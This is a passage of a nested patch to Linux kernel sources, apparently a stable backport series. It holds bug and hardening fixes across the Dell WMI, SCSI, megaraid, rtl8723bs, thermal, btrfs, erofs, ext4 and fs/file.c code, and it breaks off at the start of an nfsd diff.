+ 	tristate "Mellanox Technologies platform support"
+-	depends on I2C && REGMAP
++	depends on I2C
++	select REGMAP
+ 	help
+ 	  This option enables system support for the Mellanox Technologies
+ 	  platform. The Mellanox systems provide data center networking
+diff --git a/drivers/platform/x86/dell/dell-wmi-ddv.c b/drivers/platform/x86/dell/dell-wmi-ddv.c
+index 9cb6ae42dbdc8..96fede24877f3 100644
+--- a/drivers/platform/x86/dell/dell-wmi-ddv.c
++++ b/drivers/platform/x86/dell/dell-wmi-ddv.c
+@@ -11,9 +11,9 @@
+ #include <linux/debugfs.h>
+ #include <linux/device.h>
+ #include <linux/dev_printk.h>
++#include <linux/errno.h>
+ #include <linux/kernel.h>
+ #include <linux/kstrtox.h>
+-#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/limits.h>
+ #include <linux/power_supply.h>
+@@ -125,21 +125,27 @@ static int dell_wmi_ddv_query_buffer(struct wmi_device *wdev, enum dell_ddv_meth
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (obj->package.count != 2)
+-		goto err_free;
++	if (obj->package.count != 2 ||
++	    obj->package.elements[0].type != ACPI_TYPE_INTEGER ||
++	    obj->package.elements[1].type != ACPI_TYPE_BUFFER) {
++		ret = -ENOMSG;
+ 
+-	if (obj->package.elements[0].type != ACPI_TYPE_INTEGER)
+ 		goto err_free;
++	}
+ 
+ 	buffer_size = obj->package.elements[0].integer.value;
+ 
+-	if (obj->package.elements[1].type != ACPI_TYPE_BUFFER)
++	if (!buffer_size) {
++		ret = -ENODATA;
++
+ 		goto err_free;
++	}
+ 
+ 	if (buffer_size > obj->package.elements[1].buffer.length) {
+ 		dev_warn(&wdev->dev,
+ 			 FW_WARN "WMI buffer size (%llu) exceeds ACPI buffer size (%d)\n",
+ 			 buffer_size, obj->package.elements[1].buffer.length);
++		ret = -EMSGSIZE;
+ 
+ 		goto err_free;
+ 	}
+@@ -151,7 +157,7 @@ static int dell_wmi_ddv_query_buffer(struct wmi_device *wdev, enum dell_ddv_meth
+ err_free:
+ 	kfree(obj);
+ 
+-	return -EIO;
++	return ret;
+ }
+ 
+ static int dell_wmi_ddv_query_string(struct wmi_device *wdev, enum dell_ddv_method method,
+@@ -185,7 +191,8 @@ static ssize_t temp_show(struct device *dev, struct device_attribute *attr, char
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return sysfs_emit(buf, "%d\n", DIV_ROUND_CLOSEST(value, 10));
++	/* Use 2731 instead of 2731.5 to avoid unnecessary rounding */
++	return sysfs_emit(buf, "%d\n", value - 2731);
+ }
+ 
+ static ssize_t eppid_show(struct device *dev, struct device_attribute *attr, char *buf)
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 12346e2297fdb..8e34bbf44d1f5 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -181,6 +181,7 @@ void scsi_remove_host(struct Scsi_Host *shost)
+ 	scsi_forget_host(shost);
+ 	mutex_unlock(&shost->scan_mutex);
+ 	scsi_proc_host_rm(shost);
++	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/*
+ 	 * New SCSI devices cannot be attached anymore because of the SCSI host
+@@ -340,6 +341,7 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
++	/* In case scsi_remove_host() has not been called. */
+ 	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 4919ea54b8277..2ef9d41fc6f42 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -1519,6 +1519,8 @@ struct megasas_ctrl_info {
+ #define MEGASAS_MAX_LD_IDS			(MEGASAS_MAX_LD_CHANNELS * \
+ 						MEGASAS_MAX_DEV_PER_CHANNEL)
+ 
++#define MEGASAS_MAX_SUPPORTED_LD_IDS		240
++
+ #define MEGASAS_MAX_SECTORS                    (2*1024)
+ #define MEGASAS_MAX_SECTORS_IEEE		(2*128)
+ #define MEGASAS_DBG_LVL				1
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fp.c b/drivers/scsi/megaraid/megaraid_sas_fp.c
+index da1cad1ee1238..4463a538102ad 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fp.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fp.c
+@@ -358,7 +358,7 @@ u8 MR_ValidateMapInfo(struct megasas_instance *instance, u64 map_id)
+ 		ld = MR_TargetIdToLdGet(i, drv_map);
+ 
+ 		/* For non existing VDs, iterate to next VD*/
+-		if (ld >= (MAX_LOGICAL_DRIVES_EXT - 1))
++		if (ld >= MEGASAS_MAX_SUPPORTED_LD_IDS)
+ 			continue;
+ 
+ 		raid = MR_LdRaidGet(ld, drv_map);
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 47dafe6b8a66d..797d02a6613a6 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -2974,8 +2974,13 @@ static void sd_read_block_characteristics(struct scsi_disk *sdkp)
+ 	}
+ 
+ 	if (sdkp->device->type == TYPE_ZBC) {
+-		/* Host-managed */
++		/*
++		 * Host-managed: Per ZBC and ZAC specifications, writes in
++		 * sequential write required zones of host-managed devices must
++		 * be aligned to the device physical block size.
++		 */
+ 		disk_set_zoned(sdkp->disk, BLK_ZONED_HM);
++		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+ 	} else {
+ 		sdkp->zoned = zoned;
+ 		if (sdkp->zoned == 1) {
+diff --git a/drivers/scsi/sd_zbc.c b/drivers/scsi/sd_zbc.c
+index 62abebbaf2e7e..d33da6e1910f8 100644
+--- a/drivers/scsi/sd_zbc.c
++++ b/drivers/scsi/sd_zbc.c
+@@ -963,14 +963,6 @@ int sd_zbc_read_zones(struct scsi_disk *sdkp, u8 buf[SD_BUF_SIZE])
+ 	disk_set_max_active_zones(disk, 0);
+ 	nr_zones = round_up(sdkp->capacity, zone_blocks) >> ilog2(zone_blocks);
+ 
+-	/*
+-	 * Per ZBC and ZAC specifications, writes in sequential write required
+-	 * zones of host-managed devices must be aligned to the device physical
+-	 * block size.
+-	 */
+-	if (blk_queue_zoned_model(q) == BLK_ZONED_HM)
+-		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+-
+ 	sdkp->early_zone_info.nr_zones = nr_zones;
+ 	sdkp->early_zone_info.zone_blocks = zone_blocks;
+ 
+diff --git a/drivers/staging/rtl8723bs/include/rtw_security.h b/drivers/staging/rtl8723bs/include/rtw_security.h
+index a68b738584623..7587fa8885274 100644
+--- a/drivers/staging/rtl8723bs/include/rtw_security.h
++++ b/drivers/staging/rtl8723bs/include/rtw_security.h
+@@ -107,13 +107,13 @@ struct security_priv {
+ 
+ 	u32 dot118021XGrpPrivacy;	/*  This specify the privacy algthm. used for Grp key */
+ 	u32 dot118021XGrpKeyid;		/*  key id used for Grp Key (tx key index) */
+-	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID];	/*  802.1x Group Key, for inx0 and inx1 */
+-	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID];
+-	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID];
++	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID + 1];	/*  802.1x Group Key, for inx0 and inx1 */
++	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID + 1];
++	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID + 1];
+ 	union pn48		dot11Grptxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11Grprxpn;			/*  PN48 used for Grp Key recv. */
+ 	u32 dot11wBIPKeyid;						/*  key id used for BIP Key (tx key index) */
+-	union Keytype	dot11wBIPKey[6];		/*  BIP Key, for index4 and index5 */
++	union Keytype	dot11wBIPKey[BIP_MAX_KEYID + 1];	/*  BIP Key, for index4 and index5 */
+ 	union pn48		dot11wBIPtxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11wBIPrxpn;			/*  PN48 used for Grp Key recv. */
+ 
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+index 54004f846cf0f..84a9f4dd8f954 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+@@ -350,7 +350,7 @@ int rtw_cfg80211_check_bss(struct adapter *padapter)
+ 	bss = cfg80211_get_bss(padapter->rtw_wdev->wiphy, notify_channel,
+ 			pnetwork->mac_address, pnetwork->ssid.ssid,
+ 			pnetwork->ssid.ssid_length,
+-			WLAN_CAPABILITY_ESS, WLAN_CAPABILITY_ESS);
++			IEEE80211_BSS_TYPE_ANY, IEEE80211_PRIVACY_ANY);
+ 
+ 	cfg80211_put_bss(padapter->rtw_wdev->wiphy, bss);
+ 
+@@ -711,6 +711,7 @@ exit:
+ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+ 	struct mlme_priv *pmlmepriv = &padapter->mlmepriv;
+@@ -724,26 +725,29 @@ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS
+-			|| param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
+ 		ret = -EINVAL;
+ 		goto exit;
+ 	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if ((wep_key_idx >= WEP_KEYS) || (wep_key_len <= 0)) {
++		if (wep_key_len <= 0) {
+ 			ret = -EINVAL;
+ 			goto exit;
+ 		}
+@@ -1135,8 +1139,8 @@ void rtw_cfg80211_unlink_bss(struct adapter *padapter, struct wlan_network *pnet
+ 
+ 	bss = cfg80211_get_bss(wiphy, NULL/*notify_channel*/,
+ 		select_network->mac_address, select_network->ssid.ssid,
+-		select_network->ssid.ssid_length, 0/*WLAN_CAPABILITY_ESS*/,
+-		0/*WLAN_CAPABILITY_ESS*/);
++		select_network->ssid.ssid_length, IEEE80211_BSS_TYPE_ANY,
++		IEEE80211_PRIVACY_ANY);
+ 
+ 	if (bss) {
+ 		cfg80211_unlink_bss(wiphy, bss);
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+index 30374a820496e..40a3157fb7359 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+@@ -46,6 +46,7 @@ static int wpa_set_auth_algs(struct net_device *dev, u32 value)
+ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len, wep_total_len;
+ 	struct ndis_802_11_wep	 *pwep = NULL;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+@@ -60,19 +61,22 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS ||
+-		    param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
+-			ret = -EINVAL;
+-			goto exit;
+-		}
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
++		ret = -EINVAL;
++		goto exit;
++	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+@@ -84,9 +88,6 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if (wep_key_idx > WEP_KEYS)
+-			return -EINVAL;
+-
+ 		if (wep_key_len > 0) {
+ 			wep_key_len = wep_key_len <= 5 ? 5 : 13;
+ 			wep_total_len = wep_key_len + FIELD_OFFSET(struct ndis_802_11_wep, key_material);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+index bf1b1cdfade4a..acc11ad569758 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+@@ -194,7 +194,6 @@ static int sys_set_trip_temp(struct thermal_zone_device *tzd, int trip, int temp
+ 	proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_THRES_0, _temp);
+ 	proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_INT_ENABLE_0, 1);
+ 
+-	thermal_zone_device_enable(tzd);
+ 	pci_info->stored_thres = temp;
+ 
+ 	return 0;
+@@ -277,6 +276,10 @@ static int proc_thermal_pci_probe(struct pci_dev *pdev, const struct pci_device_
+ 		goto err_free_vectors;
+ 	}
+ 
++	ret = thermal_zone_device_enable(pci_info->tzone);
++	if (ret)
++		goto err_free_vectors;
++
+ 	return 0;
+ 
+ err_free_vectors:
+diff --git a/fs/btrfs/bio.c b/fs/btrfs/bio.c
+index 8affc88b0e0a4..e775d68834ea3 100644
+--- a/fs/btrfs/bio.c
++++ b/fs/btrfs/bio.c
+@@ -72,7 +72,7 @@ static void btrfs_log_dev_io_error(struct bio *bio, struct btrfs_device *dev)
+ 
+ 	if (btrfs_op(bio) == BTRFS_MAP_WRITE)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_WRITE_ERRS);
+-	if (!(bio->bi_opf & REQ_RAHEAD))
++	else if (!(bio->bi_opf & REQ_RAHEAD))
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_READ_ERRS);
+ 	if (bio->bi_opf & REQ_PREFLUSH)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_FLUSH_ERRS);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 708d843daa72d..d628d545ffea7 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1687,7 +1687,8 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 
+ 		btrfs_info(fs_info,
+ 			"reclaiming chunk %llu with %llu%% used %llu%% unusable",
+-				bg->start, div_u64(bg->used * 100, bg->length),
++				bg->start,
++				div64_u64(bg->used * 100, bg->length),
+ 				div64_u64(zone_unusable * 100, bg->length));
+ 		trace_btrfs_reclaim_block_group(bg);
+ 		ret = btrfs_relocate_chunk(fs_info, bg->start);
+@@ -2349,18 +2350,29 @@ static int insert_block_group_item(struct btrfs_trans_handle *trans,
+ 	struct btrfs_block_group_item bgi;
+ 	struct btrfs_root *root = btrfs_block_group_root(fs_info);
+ 	struct btrfs_key key;
++	u64 old_commit_used;
++	int ret;
+ 
+ 	spin_lock(&block_group->lock);
+ 	btrfs_set_stack_block_group_used(&bgi, block_group->used);
+ 	btrfs_set_stack_block_group_chunk_objectid(&bgi,
+ 						   block_group->global_root_id);
+ 	btrfs_set_stack_block_group_flags(&bgi, block_group->flags);
++	old_commit_used = block_group->commit_used;
++	block_group->commit_used = block_group->used;
+ 	key.objectid = block_group->start;
+ 	key.type = BTRFS_BLOCK_GROUP_ITEM_KEY;
+ 	key.offset = block_group->length;
+ 	spin_unlock(&block_group->lock);
+ 
+-	return btrfs_insert_item(trans, root, &key, &bgi, sizeof(bgi));
++	ret = btrfs_insert_item(trans, root, &key, &bgi, sizeof(bgi));
++	if (ret < 0) {
++		spin_lock(&block_group->lock);
++		block_group->commit_used = old_commit_used;
++		spin_unlock(&block_group->lock);
++	}
++
++	return ret;
+ }
+ 
+ static int insert_dev_extent(struct btrfs_trans_handle *trans,
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index be94030e1dfbf..138afa955370b 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -763,7 +763,13 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 			goto next;
+ 		}
+ 
++		flags = em->flags;
+ 		clear_bit(EXTENT_FLAG_PINNED, &em->flags);
++		/*
++		 * In case we split the extent map, we want to preserve the
++		 * EXTENT_FLAG_LOGGING flag on our extent map, but we don't want
++		 * it on the new extent maps.
++		 */
+ 		clear_bit(EXTENT_FLAG_LOGGING, &flags);
+ 		modified = !list_empty(&em->list);
+ 
+@@ -774,7 +780,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 		if (em->start >= start && em_end <= end)
+ 			goto remove_em;
+ 
+-		flags = em->flags;
+ 		gen = em->generation;
+ 		compressed = test_bit(EXTENT_FLAG_COMPRESSED, &em->flags);
+ 
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 091fd5adf818f..5cd612a8f8584 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -278,7 +278,7 @@ again:
+ 		}
+ 	}
+ 	if (no < nrpages_out && strm->buf.out)
+-		kunmap(rq->in[no]);
++		kunmap(rq->out[no]);
+ 	if (ni < nrpages_in)
+ 		kunmap(rq->in[ni]);
+ 	/* 4. push back LZMA stream context to the global list */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 5200bb86e2643..ccf7c55d477fe 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1032,12 +1032,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kcalloc(be->nr_pages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(be->nr_pages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kcalloc(pclusterpages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(pclusterpages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1085,7 +1085,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kfree(be->compressed_pages);
++		kvfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1104,7 +1104,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kfree(be->decompressed_pages);
++		kvfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
+diff --git a/fs/ext4/fsmap.c b/fs/ext4/fsmap.c
+index 4493ef0c715e9..cdf9bfe10137f 100644
+--- a/fs/ext4/fsmap.c
++++ b/fs/ext4/fsmap.c
+@@ -486,6 +486,8 @@ static int ext4_getfsmap_datadev(struct super_block *sb,
+ 		keys[0].fmr_physical = bofs;
+ 	if (keys[1].fmr_physical >= eofs)
+ 		keys[1].fmr_physical = eofs - 1;
++	if (keys[1].fmr_physical < keys[0].fmr_physical)
++		return 0;
+ 	start_fsb = keys[0].fmr_physical;
+ 	end_fsb = keys[1].fmr_physical;
+ 
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 2b42ececa46d8..1602d74b5eeb3 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -159,7 +159,6 @@ int ext4_find_inline_data_nolock(struct inode *inode)
+ 					(void *)ext4_raw_inode(&is.iloc));
+ 		EXT4_I(inode)->i_inline_size = EXT4_MIN_INLINE_DATA_SIZE +
+ 				le32_to_cpu(is.s.here->e_value_size);
+-		ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
+ 	}
+ out:
+ 	brelse(is.iloc.bh);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 9d9f414f99fec..96517785a9f89 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4797,8 +4797,13 @@ static inline int ext4_iget_extra_inode(struct inode *inode,
+ 
+ 	if (EXT4_INODE_HAS_XATTR_SPACE(inode)  &&
+ 	    *magic == cpu_to_le32(EXT4_XATTR_MAGIC)) {
++		int err;
++
+ 		ext4_set_inode_state(inode, EXT4_STATE_XATTR);
+-		return ext4_find_inline_data_nolock(inode);
++		err = ext4_find_inline_data_nolock(inode);
++		if (!err && ext4_has_inline_data(inode))
++			ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
++		return err;
+ 	} else
+ 		EXT4_I(inode)->i_inline_off = 0;
+ 	return 0;
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8067ccda34e45..8c2b1ff5e6959 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -434,6 +434,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 		ei_bl->i_flags = 0;
+ 		inode_set_iversion(inode_bl, 1);
+ 		i_size_write(inode_bl, 0);
++		EXT4_I(inode_bl)->i_disksize = inode_bl->i_size;
+ 		inode_bl->i_mode = S_IFREG;
+ 		if (ext4_has_feature_extents(sb)) {
+ 			ext4_set_inode_flag(inode_bl, EXT4_INODE_EXTENTS);
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index dd28453d6ea32..7cc3918e2f189 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -1595,11 +1595,10 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
+ 		int has_inline_data = 1;
+ 		ret = ext4_find_inline_entry(dir, fname, res_dir,
+ 					     &has_inline_data);
+-		if (has_inline_data) {
+-			if (inlined)
+-				*inlined = 1;
++		if (inlined)
++			*inlined = has_inline_data;
++		if (has_inline_data)
+ 			goto cleanup_and_exit;
+-		}
+ 	}
+ 
+ 	if ((namelen <= 2) && (name[0] == '.') &&
+@@ -3646,7 +3645,8 @@ static void ext4_resetent(handle_t *handle, struct ext4_renament *ent,
+ 	 * so the old->de may no longer valid and need to find it again
+ 	 * before reset old inode info.
+ 	 */
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
+ 	if (IS_ERR(old.bh))
+ 		retval = PTR_ERR(old.bh);
+ 	if (!old.bh)
+@@ -3813,9 +3813,20 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
+-	if (IS_ERR(old.bh))
+-		return PTR_ERR(old.bh);
++	/*
++	 * We need to protect against old.inode directory getting converted
++	 * from inline directory format into a normal one.
++	 */
++	if (S_ISDIR(old.inode->i_mode))
++		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
++
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
++	if (IS_ERR(old.bh)) {
++		retval = PTR_ERR(old.bh);
++		goto unlock_moved_dir;
++	}
++
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+ 	 *  We might rmdir the source, keep it as pwd of some process
+@@ -3873,8 +3884,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval)
++		if (retval) {
++			inode_unlock(old.inode);
+ 			goto end_rename;
++		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+@@ -4010,6 +4023,11 @@ release_bh:
+ 	brelse(old.dir_bh);
+ 	brelse(old.bh);
+ 	brelse(new.bh);
++
++unlock_moved_dir:
++	if (S_ISDIR(old.inode->i_mode))
++		inode_unlock(old.inode);
++
+ 	return retval;
+ }
+ 
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index beaec6d81074a..1e4db96a04e63 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -409,7 +409,8 @@ static void io_submit_init_bio(struct ext4_io_submit *io,
+ 
+ static void io_submit_add_bh(struct ext4_io_submit *io,
+ 			     struct inode *inode,
+-			     struct page *page,
++			     struct page *pagecache_page,
++			     struct page *bounce_page,
+ 			     struct buffer_head *bh)
+ {
+ 	int ret;
+@@ -421,10 +422,11 @@ submit_and_retry:
+ 	}
+ 	if (io->io_bio == NULL)
+ 		io_submit_init_bio(io, bh);
+-	ret = bio_add_page(io->io_bio, page, bh->b_size, bh_offset(bh));
++	ret = bio_add_page(io->io_bio, bounce_page ?: pagecache_page,
++			   bh->b_size, bh_offset(bh));
+ 	if (ret != bh->b_size)
+ 		goto submit_and_retry;
+-	wbc_account_cgroup_owner(io->io_wbc, page, bh->b_size);
++	wbc_account_cgroup_owner(io->io_wbc, pagecache_page, bh->b_size);
+ 	io->io_next_block++;
+ }
+ 
+@@ -561,8 +563,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 	do {
+ 		if (!buffer_async_write(bh))
+ 			continue;
+-		io_submit_add_bh(io, inode,
+-				 bounce_page ? bounce_page : page, bh);
++		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 	} while ((bh = bh->b_this_page) != head);
+ unlock:
+ 	unlock_page(page);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 0c6b011a91b3f..494994d9a332b 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2807,6 +2807,9 @@ shift:
+ 			(void *)header, total_ino);
+ 	EXT4_I(inode)->i_extra_isize = new_extra_isize;
+ 
++	if (ext4_has_inline_data(inode))
++		error = ext4_find_inline_data_nolock(inode);
++
+ cleanup:
+ 	if (error && (mnt_count != le16_to_cpu(sbi->s_es->s_mnt_count))) {
+ 		ext4_warning(inode->i_sb, "Unable to expand inode %lu. Delete some EAs or run e2fsck.",
+diff --git a/fs/file.c b/fs/file.c
+index c942c89ca4cda..7893ea161d770 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -642,6 +642,7 @@ static struct file *pick_file(struct files_struct *files, unsigned fd)
+ 	if (fd >= fdt->max_fds)
+ 		return NULL;
+ 
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	file = fdt->fd[fd];
+ 	if (file) {
+ 		rcu_assign_pointer(fdt->fd[fd], NULL);
+diff --git a/fs/locks.c b/fs/locks.c
+index 8f01bee177159..8a881cda3dd2a 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1862,9 +1862,10 @@ int generic_setlease(struct file *filp, long arg, struct file_lock **flp,
+ 			void **priv)
+ {
+ 	struct inode *inode = locks_inode(filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(file_mnt_user_ns(filp), inode);
+ 	int error;
+ 
+-	if ((!uid_eq(current_fsuid(), inode->i_uid)) && !capable(CAP_LEASE))
++	if ((!vfsuid_eq_kuid(vfsuid, current_fsuid())) && !capable(CAP_LEASE))
+ 		return -EACCES;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EINVAL;
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 4c3a0d84043c9..bb1e85586dfdd 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
